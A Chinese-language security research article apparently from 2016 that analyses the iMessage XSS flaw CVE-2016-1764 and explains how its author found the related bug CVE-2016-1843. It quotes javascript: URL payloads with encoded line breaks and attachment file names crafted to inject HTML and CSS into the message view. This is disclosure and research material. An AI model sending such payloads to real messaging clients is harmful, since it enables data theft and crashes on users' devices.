文/SuperHei(知道創宇404安全實驗室) 2016.4.11
注:文章里“0day”在報告給官方后分配漏洞編號:CVE-2016-1843
一、背景
在前幾天老外發布了一個在3月更新里修復的iMessage xss漏洞(CVE-2016-1764)細節 :
https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/
https://github.com/BishopFox/cve-2016-1764
他們公布這些細節里其實沒有給出詳細觸發點的分析,我分析后也就是根據這些信息發現了一個新的0day。
二、CVE-2016-1764 漏洞分析
CVE-2016-1764 里的最簡單的觸發payload: javascript://a/research?%0d%0aprompt(1) 可以看出這個是很明顯javascript協議里的一個小技巧 %0d%0 沒處理后導致的 xss ,這個tips在找xss漏洞里是比較常見的。
這個值得提一下的是 為啥要用prompt(1) 而我們常用的是alert(1) ,我實際測試了下發現alert確實沒辦法彈出來,另外在很多的網站其實把alert直接和諧過濾了,所以這里給提醒大家的是在測試xss的時候,把 prompt 替換 alert 是有必要的~
遇到這樣的客戶端的xss如果要分析,第一步應該看看location.href的信息。這個主要是看是哪個域下,這個漏洞是在applewebdata://協議下,這個原漏洞分析里有給出。然后要看具體的觸發點,一般在瀏覽器下我們可以通過看html源代碼來分析,但是在客戶端下一般看不到,所以這里用到一個小技巧:
javascript://a/research?%0d%0aprompt(1,document.head.innerHTML) 這里是看html里的head代碼
<style>@media screen and (-webkit-device-pixel-ratio:2) {}</style><link rel="stylesheet" type="text/css" href="file:///System/Library/PrivateFrameworks/SocialUI.framework/Resources/balloons-modern.css">繼續看下body的代碼:
javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)
<chatitem id="v:iMessage/xxx@xxx.com/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" role="heading" aria-level="1" item-type="header"><header guid="v:iMessage/xxx@xxx.com/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"><headermessage text-direction="ltr">與“xxx@xxx.com”進行 iMessage 通信</headermessage></header></chatitem><chatitem id="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" role="heading" aria-level="2" item-type="timestamp"><timestamp guid="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" id="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"><date date="481908183.907740">今天 23:23</date></timestamp></chatitem><chatitem id="p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-last-message-ignore-timestamps="yes" group-first-message-ignore-timestamps="yes"><message guid="p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" service="imessage" typing-indicator="no" sent="no" from-me="yes" from-system="no" from="B392EC10-CA04-41D3-A967-5BB95E301475" emote="no" played="no" auto-reply="no" group-last-message="yes" group-first-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:23:03" aria-label="javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)"><messagetextcontainer text-direction="ltr"><span style=""><a href=" " title="javascript://a/research?
prompt(1,document.body.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="compact"></date></message><spacer></spacer></chatitem><chatitem id="p:0/64989837-6626-44CE-A689-5460313DC817" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes"><message guid="p:0/64989837-6626-44CE-A689-5460313DC817" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:23:03" aria-label="javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)"><messagetextcontainer text-direction="ltr"><span style=""><a href="javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)" title="javascript://a/research?
prompt(1,document.body.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="compact"></date></message><spacer></spacer></chatitem><chatitem id="p:0/AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-last-message-ignore-timestamps="yes" group-first-message-ignore-timestamps="yes"><message guid="p:0/AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" service="imessage" typing-indicator="no" sent="no" from-me="yes" from-system="no" from="B392EC10-CA04-41D3-A967-5BB95E301475" emote="no" played="no" auto-reply="no" group-last-message="yes" group-first-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:24:51" aria-label="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)"><messagetextcontainer text-direction="ltr"><span style=""><a href="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)" title="javascript://a/research?
prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="compact"></date></message><spacer></spacer></chatitem><chatitem id="s:AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" contiguous="no" role="heading" aria-level="1" item-type="status" receipt-fade="in"><receipt from-me="YES" id="receipt-delivered-s:ae1abcf1-2397-4f20-a71f-d71ffe8042f5"><div class="receipt-container"><div class="receipt-item">已送達</div></div></receipt></chatitem><chatitem id="p:0/43545678-5DB7-4B35-8B81-xxxxxxxxxxxx" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes"><message guid="p:0/43545678-5DB7-4B35-8B81-xxxxxxxxxxxx" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:24:51" aria-label="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)"><messagetextcontainer text-direction="ltr"><span style=""><a href="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)" title="javascript://a/research?
prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="compact"></date></message><spacer></spacer></chatitem>那么關鍵的觸發點:
<a href="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)" title="javascript://a/research?
prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)</a >就是這個了。
javascript直接進入a標簽里的href,導致點擊執行。新版本的修復方案是直接不解析javascript:// 。
三、從老漏洞(CVE-2016-1764)到0day
XSS的漏洞本質是你注入的代碼最終被解析執行了,既然我們看到了document.head.innerHTML的情況,那么有沒有其他注入代碼的機會呢?首先我測試的肯定是還是那個點,嘗試用"及<>去閉合,可惜都被過濾了,這個點不行我們可以看看其他存在輸入的點,于是我嘗試發個附件看看解析情況,部分代碼如下:
<chatitem id="p:0/FE98E898-0385-41E6-933F-8E87DB10AA7E" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="attachment" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes"><message guid="p:0/FE98E898-0385-41E6-933F-8E87DB10AA7E" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:34:41" file-transfer-element="yes" aria-label="文件傳輸: tttt.html"><messagetextcontainer text-direction="ltr"><transfer class="transfer" id="45B8E6BD-9826-47E2-B910-D584CE461E5F" guid="45B8E6BD-9826-47E2-B910-D584CE461E5F"><transfer-atom draggable="true" aria-label="tttt.html" id="45B8E6BD-9826-47E2-B910-D584CE461E5F" guid="45B8E6BD-9826-47E2-B910-D584CE461E5F">< img class="transfer-icon" extension="html" aria-label="文件擴展名: html" style="content: -webkit-image-set(url(transcript-resource://iconpreview/html/16) 1x, url(transcript-resource://iconpreview/html-2x/16) 2x);"><span class="transfer-text" color-important="no">tttt</span></transfer-atom><div class="transfer-button-container">< img class="transfer-button-reveal" aria-label="顯示" id="filetransfer-button-45B8E6BD-9826-47E2-B910-D584CE461E5F" role="button"></div></transfer></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="compact"></date></message><spacer></spacer></chatitem>發了個tttt.html的附件,這個附件的文件名出現在代碼里,或許有控制的機會。多長測試后發現過濾也比較嚴格,不過最終還是發現一個潛在的點,也就是文件名的擴展名部分:
<chatitem id="p:0/D4591950-20AD-44F8-80A1-E65911DCBA22" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="attachment" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes"><message guid="p:0/D4591950-20AD-44F8-80A1-E65911DCBA22" typing-indicator="no" sent="no" from-me="no" from-system="no" from="93D2D530-0E94-4CEB-A41E-2F21DE32715D" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 16:46:10" file-transfer-element="yes" aria-label="文件傳輸: testzzzzzzz"'><img src=1>.htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d"><messagetextcontainer text-direction="ltr"><transfer class="transfer" id="A6BE6666-ADBF-4039-BF45-042D261EA458" guid="A6BE6666-ADBF-4039-BF45-042D261EA458"><transfer-atom draggable="true" aria-label="testzzzzzzz"'><img src=1>.htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d" id="A6BE6666-ADBF-4039-BF45-042D261EA458" guid="A6BE6666-ADBF-4039-BF45-042D261EA458">< img class="transfer-icon" extension="htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d" aria-label="文件擴展名: htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d" style="content: -webkit-image-set(url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d/16) 1x, url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d-2x/16) 2x);"><span class="transfer-text" color-important="no">testzzzzzzz"'><img src=1></span></transfer-atom><div class="transfer-button-container">< img class="transfer-button-reveal" aria-label="顯示" id="filetransfer-button-A6BE6666-ADBF-4039-BF45-042D261EA458" role="button"></div></transfer></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="compact"></date></message><spacer></spacer></chatitem>我們提交的附件的后綴進入了style :
style="content: -webkit-image-set(url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d/16) 1x, url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d-2x/16) 2x);也就是可能導致css注入,或許我們還有機會,不過經過測試也是有過濾處理的,比如/ 直接被轉為了:這個非常有意思 所謂“成也蕭何,敗也蕭何”,如果你要注入css那么肯定給屬性給值就得用: 但是:又不能出現在文件名里,然后我們要注入css里掉用遠程css或者圖片需要用/ 而/又被處理了變成了:
不管怎么樣我先注入個css測試下,于是提交了一附件名:
zzzzzz.htm) 1x);color/red;aaa/((按推斷/變為了: 如果注入成功應該是
style="content: -webkit-image-set(url(transcript-resource://iconpreview/htm::16) 1x);color:red;aaa:((當我提交測試發送這個附件的時候,我的iMessage 崩潰了~~ 這里我想我發現了一個新的漏洞,于是我升級OSX到最新的系統重新測試結果:一個全新的0day誕生!
四、后記
當然這里還有很多地方可以測試,也有一些思路也可以去測試下,比如那個名字那里這個應該是可控制的,比如附件是保存在本地的有沒有可能存在目錄專挑導致寫到任意目錄的地方。有需求的可以繼續測試下,說不定下個0day就是你的 :)
最后我想說的是在分析別人發現的漏洞的時候一定要找到漏洞的關鍵,然后總結提煉出“模型”,然后去嘗試新的攻擊思路或者界面!
參考鏈接
https://www.seebug.org/vuldb/ssvid-92471
本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/65/
暫無評論